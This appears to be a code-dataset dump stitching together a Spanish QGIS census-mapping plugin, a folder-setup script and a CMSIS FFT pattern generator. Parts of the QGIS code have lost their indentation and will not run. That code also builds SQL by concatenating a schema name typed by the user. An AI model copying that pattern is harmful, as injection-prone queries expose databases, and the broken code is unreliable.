aglomerado = QInputDialog.getText(None, 'aglomerado', 'Introduce el nombre completo PPDDDLLL', text = 'e86154030')
origen = os.path.dirname(__file__)
# print(sys.path[0])
# print (origen)
####################### Agrego las tablas .CSV de datos geograficos############################
####### Agrego tabla provincia
capa = (origen + '/datos_prov/provincia.csv')
nomcapa = 'provincia'
layer = QgsVectorLayer(capa,nomcapa, 'ogr' )
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
####### Agrego tabla departamento##################################
capa = (origen + '/datos_prov/departamentos.csv')
nomcapa = 'departamento'
layer = QgsVectorLayer(capa,nomcapa, 'ogr')
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
####### Agrego tabla localidad######################
capa = (origen + '/datos_prov/localidad.csv')
nomcapa = 'localidad'
layer = QgsVectorLayer(capa,nomcapa,'ogr')
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
########################## Agrego todas las capas al proyecto###################################
#### agrego capa de puntitos
sql = aglomerado[0]
uri.setDataSource("", "(select r3.seg, r3.viviendas, r3.descripcion, concat(prov,lpad(r3.dpto::text,3,'0'),lpad(r3.codloc::text,3,'0'),lpad(r3.frac::text,2,'0'),lpad(r3.radio::text,2,'0'),seg) link, coalesce(st_collect(l.wkb_geometry_lado),st_makeline(st_point(0,0), st_point(1,1))) geolado, coalesce(st_collect(l.wkb_geometry),st_point(0,0)) geom from " + sql + ".r3 " +" join "+ sql+".segmentacion s on r3.segmento_id=s.segmento_id" + " join "+ sql + ".listado_geo l on l.id_list = s.listado_id group by r3.seg, r3.viviendas, r3.descripcion, r3.prov, r3.dpto, r3.codloc , r3.frac, r3.radio)","geom","", "link")
layer = QgsVectorLayer(uri.uri(), "Listado_viv", "postgres")
if not layer.isValid():
print ("No se cargo capa Listado")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen +'/estilo_radio/listado.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
########################### Agregar plantillas de salida##############
#### Plantilla tamaño A4 ###############
pry= QgsProject.instance()
#Añadi una verificación de la ruta del archivo qtp
####### Agrego la capa Segmento
uri.setDataSource(aglomerado[0], "arc" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "Segmentacion", "postgres")
if not layer.isValid():
print ("No se cargo capa Segmento")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen + '/estilo_radio/segmentos.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
########Agrego la capa Mascara
sql = aglomerado[0] + ".v_radios"
uri.setDataSource("", "( select * from " + sql + ")","wkb_geometry","","gid")
vlayer = QgsVectorLayer(uri.uri(),"Mascara","postgres")
if not vlayer.isValid():
print ("No se cargola capa Mascara ")
QgsProject.instance().addMapLayer(vlayer)
renderer = vlayer.renderer()
vlayer.loadNamedStyle(origen +'/estilo_radio/mascara.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
vlayer.triggerRepaint()
#######Agrego la capa Especiales
uri.setDataSource(aglomerado[0], "arc" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "CodEspeciales", "postgres")
if not layer.isValid():
print ("No se cargo capa Codigos Especiales")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen + '/estilo_radio/especiales.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
####### Agrego la capa Radios desde BD
sql = aglomerado[0] + ".v_radios"
uri.setDataSource("", "( select * from " + sql + ")","wkb_geometry","","gid")
vlayer = QgsVectorLayer(uri.uri(),"Radio","postgres")
if not vlayer.isValid():
print ("No se cargo la capa Radio ")
QgsProject.instance().addMapLayer(vlayer)
renderer = vlayer.renderer()
vlayer.loadNamedStyle(origen +'/estilo_radio/pradio.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
vlayer.triggerRepaint()
####### Agrego la capa Etiquetas Manzanas
uri.setDataSource(aglomerado[0] , "lab" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "Etiqueta_manzana", "postgres")
if not layer.isValid():
print ("No se cargo capa Etiquetas manzanas")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen +'/estilo_radio/manzanas.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
############################# Agrego la capa Descripcion ###########################
sql = aglomerado[0]
uri.setDataSource("","( select seg, replace(descripcion, '. ' , '\n') descripcion , viviendas, link, lpad( radio::text,2,'0') radio , st_collect(geom) geom FROM (select r3.radio , r3.seg, r3.viviendas, r3.descripcion, concat(lpad(r3.prov::text,2,'0'),lpad(r3.dpto::text,3,'0'),lpad(r3.codloc::text,3,'0'), lpad(r3.frac::text,2,'0'),lpad( r3.radio::text,2,'0') ,seg) link, coalesce(case when l.lado is null then null when count(*)=1 then ST_AddPoint(ST_MakeLine(st_startpoint(l.wkb_geometry_lado),max(l.wkb_geometry)),st_endpoint(l.wkb_geometry_lado)) else st_makeline(l.wkb_geometry order by orden_reco) end, st_makeline(ST_SetSRID(st_point(0,0),st_srid(wkb_geometry_lado))),ST_SetSRID(st_point(0,1), st_srid(wkb_geometry_lado)) ) geom from " + sql+ ".r3 left join " + sql+ ".segmentacion s on r3.segmento_id=s.segmento_id left join " +sql+ ".listado_geo l on l.id_list = s.listado_id group by r3.radio, r3.seg, r3.viviendas, r3.descripcion, r3.prov, r3.dpto, r3.codloc , r3.frac, r3.radio, l.lado, l.mza, l.wkb_geometry_lado ) foo group by radio , seg , viviendas , descripcion , link )", "geom" , "", "link")
layer = QgsVectorLayer(uri.uri(), "descripcion", "postgres")
if not layer.isValid():
print ("No se cargo capa Descripcion")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen +'/estilo_radio/descripcion.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
########################### Agregar plantillas de salida##############
#### Plantilla tamaño A4 ###############
pry= QgsProject.instance()
#Añadi una verificación de la ruta del archivo qtp
#### Plantilla R3 ###############
rutaR3= origen + r'/plantillas/R3.qpt'
if os.path.exists(rutaR3):
with open(rutaR3, 'r') as templateFile:
myTemplateContent = templateFile.read()
layout=QgsPrintLayout(pry)
lmg = QgsProject.instance().layoutManager()
layout.setName("R3")
layout.initializeDefaults()
myDocument = QDomDocument()
myDocument.setContent(myTemplateContent)
ms = QgsMapSettings()
layout.loadFromTemplate(myDocument,QgsReadWriteContext(),True)
lmg.addLayout(layout)
else:
print("error en la ruta del archivo R3" )
#### Plantilla tamaño A4 ###############
rutaR4= origen + r'/plantillas/radio_A4.qpt'
if os.path.exists(rutaR4):
with open(rutaR4, 'r') as templateFile:
myTemplateContent = templateFile.read()
layout=QgsPrintLayout(pry)
lmg = QgsProject.instance().layoutManager()
layout.setName("A4")
layout.initializeDefaults()
myDocument = QDomDocument()
myDocument.setContent(myTemplateContent)
ms = QgsMapSettings()
layout.loadFromTemplate(myDocument,QgsReadWriteContext(),True)
lmg.addLayout(layout)
else:
print("error en la ruta del archivo" )
#### Plantilla tamaño A3 ###############
rutaR3= ruta= origen + r'/plantillas/radio_A3.qpt'
if os.path.exists(rutaR3):
with open(rutaR3, 'r') as templateFile:
myTemplateContent = templateFile.read()
layout=QgsPrintLayout(pry)
lmg = QgsProject.instance().layoutManager()
layout.setName("A3")
layout.initializeDefaults()
myDocument = QDomDocument()
myDocument.setContent(myTemplateContent)
ms = QgsMapSettings()
layout.loadFromTemplate(myDocument,QgsReadWriteContext(),True)
lmg.addLayout(layout)
else:
print("error en la ruta del archivo A3")
def runSegmento(self , iface):
    """Build the "segmento" QGIS project.

    Connects to the PostGIS database (connection parameters from QSettings,
    credentials asked interactively), loads the reference CSV tables, the
    thematic PostGIS layers with their .qml styles, and the A4/A3 print
    layout templates.

    NOTE(review): the import below rebinds the ``iface`` parameter to the
    global QGIS interface object — kept exactly as the original did.

    Refactor notes: the original repeated the same load-layer stanza ~10
    times; it is factored into nested helpers here. Dead code was removed:
    unused ``renderer = layer.renderer()`` / ``ms = QgsMapSettings()``
    locals and the no-op ``QgsProject.instance().mapLayers().values()``
    expression statements. All layer names, SQL, style paths and messages
    are unchanged.
    """
    from qgis.utils import iface
    # ---------------- PostGIS connection ----------------
    QgsProject.instance().clear()
    qs = QSettings()
    dbHost = qs.value("PostgreSQL/connections/informatica/host", '10.70.80.62')
    dbPort = qs.value("PostgreSQL/connections/informatica/port", '5432')
    dbName = qs.value("PostgreSQL/connections/informatica/database", 'DEVSEG')
    # QInputDialog.getText returns a (text, ok) tuple; only the text is
    # used and the ok flag is ignored, as in the original.
    dbUsr = QInputDialog.getText(None, 'usuario', 'Introduce el nombre de usuario de la base de datos')
    dbPwd = QInputDialog.getText(None, 'contraseña', 'Introduce la contraseña', QLineEdit.Password)
    uri = QgsDataSourceUri()
    uri.setConnection(dbHost, dbPort, dbName, dbUsr[0], dbPwd[0])
    aglomerado = QInputDialog.getText(None, 'aglomerado', 'Introduce el nombre completo PPDDDLLL', text = 'e86154030')
    origen = os.path.dirname(__file__)
    esquema = aglomerado[0]  # PostGIS schema name typed by the user

    def _capa_csv(archivo, nombre):
        # Load one reference .csv table with the OGR provider.
        layer = QgsVectorLayer(origen + '/datos_prov/' + archivo, nombre, 'ogr')
        if not layer.isValid():
            print("la capa no es correcta")
        QgsProject.instance().addMapLayer(layer)

    def _capa_postgres(nombre, msg_error, estilo):
        # Load a layer from whatever data source is currently set on
        # `uri`, attach its .qml style and refresh the canvas.
        layer = QgsVectorLayer(uri.uri(), nombre, "postgres")
        if not layer.isValid():
            print(msg_error)
        QgsProject.instance().addMapLayer(layer)
        layer.loadNamedStyle(origen + estilo)
        iface.mapCanvas().refresh()
        layer.triggerRepaint()

    # ---------------- reference CSV tables ----------------
    _capa_csv('provincia.csv', 'provincia')
    _capa_csv('departamentos.csv', 'departamento')
    _capa_csv('localidad.csv', 'localidad')

    # ---------------- thematic layers ----------------
    # Dwelling listing ("capa de puntitos"): one geometry per segment,
    # collected from the listado_geo rows joined through segmentacion.
    uri.setDataSource("", "(select r3.seg, r3.viviendas, r3.descripcion, concat(prov,lpad(r3.dpto::text,3,'0'),lpad(r3.codloc::text,3,'0'),lpad(r3.frac::text,2,'0'),lpad(r3.radio::text,2,'0'),seg) link, coalesce(st_collect(l.wkb_geometry_lado),st_makeline(st_point(0,0), st_point(1,1))) geolado, coalesce(st_collect(l.wkb_geometry),st_point(0,0)) geom from " + esquema + ".r3 " + " join " + esquema + ".segmentacion s on r3.segmento_id=s.segmento_id" + " join " + esquema + ".listado_geo l on l.id_list = s.listado_id group by r3.seg, r3.viviendas, r3.descripcion, r3.prov, r3.dpto, r3.codloc , r3.frac, r3.radio)", "geom", "", "link")
    _capa_postgres("Listado_viv", "No se cargo capa Listado", '/estilo_segmento/listadosegmento.qml')
    # Segments (arc table).
    uri.setDataSource(esquema, "arc", "wkb_geometry")
    _capa_postgres("segmentos", "No se cargo capa segmento", '/estilo_segmento/segmento.qml')
    # Mask over the radio polygons.
    uri.setDataSource("", "( select * from " + esquema + ".v_radios" + ")", "wkb_geometry", "", "gid")
    _capa_postgres("Mascara", "No se cargola capa Mascara ", '/estilo_segmento/mascara.qml')
    # Special codes (same arc table, different style).
    uri.setDataSource(esquema, "arc", "wkb_geometry")
    _capa_postgres("especiales", "No se cargo la capa de codigos especiales", '/estilo_segmento/especiales.qml')
    # Radio polygons.
    uri.setDataSource("", "( select * from " + esquema + ".v_radios" + ")", "wkb_geometry", "", "gid")
    _capa_postgres("Radio", "No se cargo la capa Radio ", '/estilo_segmento/pradio.qml')
    # Block (manzana) labels.
    uri.setDataSource("", "( select * from " + esquema + ".v_manzanas" + ")", "wkb_geometry", "", "gid")
    _capa_postgres("etiqueta_manzana", "el numero de aglomerado no es correcto", '/estilo_segmento/manzana.qml')
    # Segment description layer (style shared with the "radio" project).
    uri.setDataSource("", "( select seg, descripcion , viviendas, link, lpad( radio::text,2,'0') radio , st_collect(geom) geom FROM (select r3.radio , r3.seg, r3.viviendas, r3.descripcion, concat(lpad(r3.prov::text,2,'0'),lpad(r3.dpto::text,3,'0'),lpad(r3.codloc::text,3,'0'), lpad(r3.frac::text,2,'0'),lpad( r3.radio::text,2,'0') ,seg) link, coalesce(case when l.lado is null then null when count(*)=1 then ST_AddPoint(ST_MakeLine(st_startpoint(l.wkb_geometry_lado),max(l.wkb_geometry)),st_endpoint(l.wkb_geometry_lado)) else st_makeline(l.wkb_geometry order by orden_reco) end, st_makeline(ST_SetSRID(st_point(0,0),st_srid(wkb_geometry_lado))),ST_SetSRID(st_point(0,1), st_srid(wkb_geometry_lado)) ) geom from " + esquema + ".r3 left join " + esquema + ".segmentacion s on r3.segmento_id=s.segmento_id left join " + esquema + ".listado_geo l on l.id_list = s.listado_id group by r3.radio, r3.seg, r3.viviendas, r3.descripcion, r3.prov, r3.dpto, r3.codloc , r3.frac, r3.radio, l.lado, l.mza, l.wkb_geometry_lado ) foo group by radio , seg , viviendas , descripcion , link )", "geom", "", "link")
    _capa_postgres("descripcion", "No se cargo capa Descripcion", '/estilo_radio/descripcion.qml')
    # Atlas coverage layer: one (merged) geometry per segment, built from
    # both sides of the arcs.
    sql = "((((SELECT row_number() over () AS _uid_ , * , concat(prov,depto, loc,frac,radio,lpad(seg::text,2,'0')) linkcapa FROM (SELECT row_number () over () id, prov,depto,loc,frac,radio,seg, geom FROM (SELECT prov,depto,loc,frac,radio,seg,(st_union(geom )) geom FROM (SELECT substring(mza,1,2) prov, substring(mza, 3,3) depto, substring(mza,6,3) loc, substring(mza,9,2) frac, substring(mza,11,2) radio, seg, geom FROM (SELECT mzai mza, ladoi lado, segi seg , wkb_geometry geom FROM " + esquema + ".arc" + " where segi is not null UNION SELECT mzad mza, ladod lado, segd seg, wkb_geometry geom FROM " + esquema + ".arc" + " where segd is not null ) foo ) foo2 group by prov,depto,loc,frac,radio,seg ) foo3 ) AS _subq_1_ ) ) ) )"
    uri.setDataSource("", sql, "geom", "", "_uid_")
    _capa_postgres("capaseg", "No se cargo la capa ", '/estilo_segmento/capaconsulta.qml')

    # ---------------- print layout templates ----------------
    pry = QgsProject.instance()

    def _plantilla(ruta, nombre, msg_error):
        # Load a .qpt composer template into the project layout manager;
        # print msg_error if the template file is missing.
        if os.path.exists(ruta):
            with open(ruta, 'r') as templateFile:
                contenido = templateFile.read()
            layout = QgsPrintLayout(pry)
            layout.setName(nombre)
            layout.initializeDefaults()
            documento = QDomDocument()
            documento.setContent(contenido)
            layout.loadFromTemplate(documento, QgsReadWriteContext(), True)
            QgsProject.instance().layoutManager().addLayout(layout)
        else:
            print(msg_error)

    _plantilla(origen + r'/plantillas/segmento_A4.qpt', "A4", "error en la ruta del archivo")
    _plantilla(origen + r'/plantillas/segmento_A3.qpt', "A3", "error en la ruta del archivo A3")
def runFraccion(self, iface):
from qgis.utils import iface
#####################################Conexion existente en el admnistrador de BD##############################################
##########Conexion desde BD a Postgis
QgsProject.instance().clear()
qs = QSettings()
dbHost = qs.value("PostgreSQL/connections/informatica/host",'10.70.80.62')
dbPort = qs.value("PostgreSQL/connections/informatica/port",'5432')
dbName = qs.value("PostgreSQL/connections/informatica/database",'DEVSEG')
############Pedir al usuario cargar los campos de usuario y contraseña
dbUsr = QInputDialog.getText(None, 'usuario', 'Introduce el nombre de usuario de la base de datos')
dbPwd = QInputDialog.getText(None, 'contraseña', 'Introduce la contraseña', QLineEdit.Password)
#####################################Conexion PostGIS##############################################
# introducimos nombre del servidor, puerto, nombre de la base de datos, usuario y contraseña
uri = QgsDataSourceUri()
uri.setConnection(dbHost,dbPort,dbName,dbUsr[0],dbPwd[0])
##############################Verificar Usuuario y Contraseña##########################################
# origen = QInputDialog.getText(None, 'origen', 'Introduce la ruta de acceso')
aglomerado = QInputDialog.getText(None, 'aglomerado', 'Introduce el nombre completo PPDDDLLL', text = 'e86154030')
origen = os.path.dirname(__file__)
# print(sys.path[0])
# print (origen)
####################### Agrego las tablas .CSV de datos geograficos############################
####### Agrego tabla provincia
capa = (origen + '/datos_prov/provincia.csv')
nomcapa = 'provincia'
layer = QgsVectorLayer(capa,nomcapa, 'ogr' )
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
####### Agrego tabla departamento##################################
capa = (origen + '/datos_prov/departamentos.csv')
nomcapa = 'departamento'
layer = QgsVectorLayer(capa,nomcapa, 'ogr')
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
####### Agrego tabla localidad######################
capa = (origen + '/datos_prov/localidad.csv')
nomcapa = 'localidad'
layer = QgsVectorLayer(capa,nomcapa,'ogr')
if not layer.isValid():
print ("la capa no es correcta")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
########################## Agrego todas las capas al proyecto###################################
#### agrego capa de puntitos
sql = aglomerado[0]
uri.setDataSource("", "(select r3.seg, r3.viviendas, r3.descripcion, concat(prov,lpad(r3.dpto::text,3,'0'),lpad(r3.codloc::text,3,'0'),lpad(r3.frac::text,2,'0'),lpad(r3.radio::text,2,'0'),seg) link, coalesce(st_collect(l.wkb_geometry_lado),st_makeline(st_point(0,0), st_point(1,1))) geolado, coalesce(st_collect(l.wkb_geometry),st_point(0,0)) geom from " + sql + ".r3 " +" join "+ sql+".segmentacion s on r3.segmento_id=s.segmento_id" + " join "+ sql + ".listado_geo l on l.id_list = s.listado_id group by r3.seg, r3.viviendas, r3.descripcion, r3.prov, r3.dpto, r3.codloc , r3.frac, r3.radio)","geom","", "link")
layer = QgsVectorLayer(uri.uri(), "Listado_viv", "postgres")
if not layer.isValid():
print ("No se cargo capa Listado")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen +'/estilo_radio/listado.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
########################### Agregar plantillas de salida##############
#### Plantilla tamaño A4 ###############
pry= QgsProject.instance()
#Añadi una verificación de la ruta del archivo qtp
####### Agrego la capa Segmento
uri.setDataSource(aglomerado[0], "arc" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "Segmentacion", "postgres")
if not layer.isValid():
print ("No se cargo capa Segmento")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
layer.loadNamedStyle(origen + '/estilo_radio/segmentos.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
layer.triggerRepaint()
########Agrego la capa Mascara
sql = aglomerado[0] + ".v_radios"
uri.setDataSource("", "( select * from " + sql + ")","wkb_geometry","","gid")
vlayer = QgsVectorLayer(uri.uri(),"Mascara","postgres")
if not vlayer.isValid():
print ("No se cargola capa Mascara ")
QgsProject.instance().addMapLayer(vlayer)
renderer = vlayer.renderer()
vlayer.loadNamedStyle(origen +'/estilo_radio/mascara.qml')
iface.mapCanvas().refresh()
QgsProject.instance().mapLayers().values()
vlayer.triggerRepaint()
#######Agrego la capa Especiales
uri.setDataSource(aglomerado[0], "arc" , "wkb_geometry" )
layer = QgsVectorLayer(uri.uri(), "CodEspeciales", "postgres")
if not layer.isValid():
print ("No se cargo capa Codigos Especiales")
QgsProject.instance().addMapLayer(layer)
renderer = layer.renderer()
| 49.810811 | 1,131 | 0.582501 | 3,928 | 36,860 | 5.397403 | 0.13442 | 0.049243 | 0.028867 | 0.017641 | 0.767935 | 0.758974 | 0.744352 | 0.74039 | 0.738361 | 0.732654 | 0 | 0.012152 | 0.247667 | 36,860 | 739 | 1,132 | 49.878214 | 0.752371 | 0.179951 | 0 | 0.743697 | 1 | 0.02521 | 0.289595 | 0.108683 | 0.002101 | 0 | 0 | 0 | 0 | 1 | 0.018908 | false | 0.006303 | 0.027311 | 0 | 0.052521 | 0.069328 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c85b219c6f44eb495f31f7adcae725faf69ba91f | 9,975 | py | Python | image_dicer/Scriptv3/a010_CreateFolders.py | tostathaina/farsight | 7e9d6d15688735f34f7ca272e4e715acd11473ff | [
"Apache-2.0"
] | 8 | 2016-07-22T11:24:19.000Z | 2021-04-10T04:22:31.000Z | image_dicer/Scriptv3/a010_CreateFolders.py | YanXuHappygela/Farsight | 1711b2a1458c7e035edd21fe0019a1f7d23fcafa | [
"Apache-2.0"
] | null | null | null | image_dicer/Scriptv3/a010_CreateFolders.py | YanXuHappygela/Farsight | 1711b2a1458c7e035edd21fe0019a1f7d23fcafa | [
"Apache-2.0"
] | 7 | 2016-07-21T07:39:17.000Z | 2020-01-29T02:03:27.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import shutil
import fnmatch
import os
# ---------------------------------------------------------------------------------------------------------------------------------------
# Create Folder
# ---------------------------------------------------------------------------------------------------------------------------------------
def main( LOCAL_DEB_DATASET_PATH, LOCAL_DATASET_PATH_EXE, LOCAL_DATASET_PATH_LOG, LOCAL_DATASET_PATH_DEBUG, LOCAL_DATASET_PATH_DATA, LOCAL_DATASET_PATH_DATA_DEBUG, LOCAL_DATASET_PATH_SEGM, LOCAL_DATASET_PATH_SEGM_DEBUG, LOCAL_DATASET_PATH_SEGM_DEBUG_L2, LOCAL_DATASET_PATH_SEGM_TEMP, LOCAL_DATASET_PATH_TRAC, LOCAL_DATASET_PATH_TRAC_DEBUG, LOCAL_DATASET_PATH_TRAC_DEBUG_L2, LOCAL_DATASET_PATH_TRAC_TEMP, GLOBAL_DATASET_PATH_RESULTS, LOCAL_DATASET_PATH_TRAC_RESULTS, LOCAL_DATASET_PATH_ASTRO_TRAC, LOCAL_DATASET_PATH_ASTRO_TRAC_RESULTS, LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG, LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG_L2, LOCAL_DATASET_PATH_ASTRO_TRAC_TEMP ):
    """Create (or reset) the working-folder hierarchy for the pipeline.

    Every argument is a directory path. A missing directory is created
    with os.makedirs. An existing directory is announced with an
    "erasing folder" message but — matching the original behaviour, where
    the clean-up loops were commented out everywhere else — only
    LOCAL_DATASET_PATH_EXE actually has the files inside it deleted.

    The 21 near-identical copy-pasted stanzas of the original are folded
    into one helper; the Python-2-only syntax (``print x``,
    ``except Exception, e``) is rewritten in the subset that runs under
    both Python 2.6+ and Python 3.
    """
    def _prepare(path, purge=False):
        # Create `path` if absent; otherwise report it and, when `purge`
        # is set, best-effort-delete each entry directly inside it.
        if not os.path.isdir(path):
            print('creating folder: ' + path)
            os.makedirs(path)
        else:
            print('erasing folder: ' + path)
            if purge:
                for the_file in os.listdir(path):
                    file_path = os.path.join(path, the_file)
                    try:
                        os.unlink(file_path)
                    except Exception as e:
                        # e.g. a sub-directory: report and keep going,
                        # as the original did.
                        print(e)

    _prepare(LOCAL_DEB_DATASET_PATH)
    # Only the EXE folder is actively emptied when it already exists.
    _prepare(LOCAL_DATASET_PATH_EXE, purge=True)
    # All remaining folders, in the original processing order.
    for folder in (LOCAL_DATASET_PATH_LOG,
                   LOCAL_DATASET_PATH_DEBUG,
                   LOCAL_DATASET_PATH_DATA,
                   LOCAL_DATASET_PATH_DATA_DEBUG,
                   LOCAL_DATASET_PATH_SEGM,
                   LOCAL_DATASET_PATH_SEGM_DEBUG,
                   LOCAL_DATASET_PATH_SEGM_DEBUG_L2,
                   LOCAL_DATASET_PATH_SEGM_TEMP,
                   LOCAL_DATASET_PATH_TRAC,
                   LOCAL_DATASET_PATH_TRAC_DEBUG,
                   LOCAL_DATASET_PATH_TRAC_DEBUG_L2,
                   LOCAL_DATASET_PATH_TRAC_TEMP,
                   GLOBAL_DATASET_PATH_RESULTS,
                   LOCAL_DATASET_PATH_TRAC_RESULTS,
                   LOCAL_DATASET_PATH_ASTRO_TRAC,
                   LOCAL_DATASET_PATH_ASTRO_TRAC_RESULTS,
                   LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG,
                   LOCAL_DATASET_PATH_ASTRO_TRAC_DEBUG_L2,
                   LOCAL_DATASET_PATH_ASTRO_TRAC_TEMP):
        _prepare(folder)
if __name__ == "__main__":
main() | 37.5 | 650 | 0.761504 | 1,526 | 9,975 | 4.536697 | 0.032765 | 0.233569 | 0.307381 | 0.120757 | 0.936877 | 0.886465 | 0.821465 | 0.71443 | 0.599162 | 0.47855 | 0 | 0.002521 | 0.125213 | 9,975 | 266 | 651 | 37.5 | 0.790855 | 0.380752 | 0 | 0.179487 | 0 | 0 | 0.11581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.025641 | null | null | 0.367521 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2394b3c750055942bd5d7d45e427cba0f773c70b | 25,899 | py | Python | Kernels/Research/FFT/FFT.py | WoodData/EndpointAI | 8e4d145ff45cf5559ab009eba4f423e944dc6975 | [
"Apache-2.0"
] | 190 | 2020-09-22T02:14:29.000Z | 2022-03-28T02:35:57.000Z | Kernels/Research/FFT/FFT.py | chuancqc/EndpointAI | ab67cefeae3c06f1c93f66812bcf988c14e72ff1 | [
"Apache-2.0"
] | 2 | 2021-08-30T10:06:22.000Z | 2021-11-05T20:37:58.000Z | Kernels/Research/FFT/FFT.py | chuancqc/EndpointAI | ab67cefeae3c06f1c93f66812bcf988c14e72ff1 | [
"Apache-2.0"
] | 80 | 2020-09-13T17:48:56.000Z | 2022-03-19T10:45:05.000Z | #
#
# Copyright (C) 2010-2021 ARM Limited or its affiliates. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os.path
import numpy as np
import itertools
import scipy.fftpack
import scipy.fft
import argparse
import sys
# Command-line interface: -f is the root under which the Patterns/ and
# Parameters/ trees are written; -r points to the CMSIS pattern-generation
# folder (CMSIS/DSP/Testing/PatternGeneration/) that contains the Tools module.
parser = argparse.ArgumentParser(description='Pattern generation')
parser.add_argument('-f', nargs='?',type = str, default="", help="Path to folder containing Patterns folder")
parser.add_argument('-r', nargs='?',type = str, help="CMSIS Root")
args = parser.parse_args()
# Make the project's Tools helper module importable from the given folder,
# falling back to a local "PatternGeneration" directory.
if args.r:
    sys.path.append(args.r)
else:
    sys.path.append("PatternGeneration")
import Tools
# Those patterns are used for tests and benchmarks.
# For tests, there is the need to add tests for saturation.
# The FFT kernels support radixes 2, 3 and 5; the primary block lengths are
# 8, 6, 5, 4, 3, 2, and all tested FFT sizes are built as products of up to
# three of these primary lengths (see SECOND/THIRD below).
PRIMARY=[8,6,5,4,3,2]
def cartesian(*somelists):
    """Return the Cartesian product of the given lists as a list of lists."""
    return [list(combo) for combo in itertools.product(*somelists)]
# Products of two and of three primary block lengths.
SECOND = [x*y for (x,y) in cartesian(PRIMARY,PRIMARY)]
THIRD = [x*y for (x,y) in cartesian(SECOND,PRIMARY)]
# All tested complex FFT sizes: deduplicated and sorted, with the 4096
# benchmark size appended at the end.
FFTSIZES = PRIMARY + SECOND + THIRD
FFTSIZES = sorted(list(set(FFTSIZES))) + [4096]
def iseven(a):
    """Return True when the integer *a* is even."""
    return (a & 1) == 0
# The real FFT is only implemented for even lengths; keep the even sizes
# (dropping the first and last entries) and append the 4096 benchmark size.
REALFFTSIZES=list(filter(iseven,FFTSIZES))[1:-1] + [4096]
# (rows, cols) shapes used for the 2-D FFT tests.
FFT2DSIZES=[(4,9),(8,4),(64,4)]
# Candidate sine and noise amplitudes for the generated test signals.
SINES=[0.25,0.5,0.9]
NOISES=[0.1,0.4]
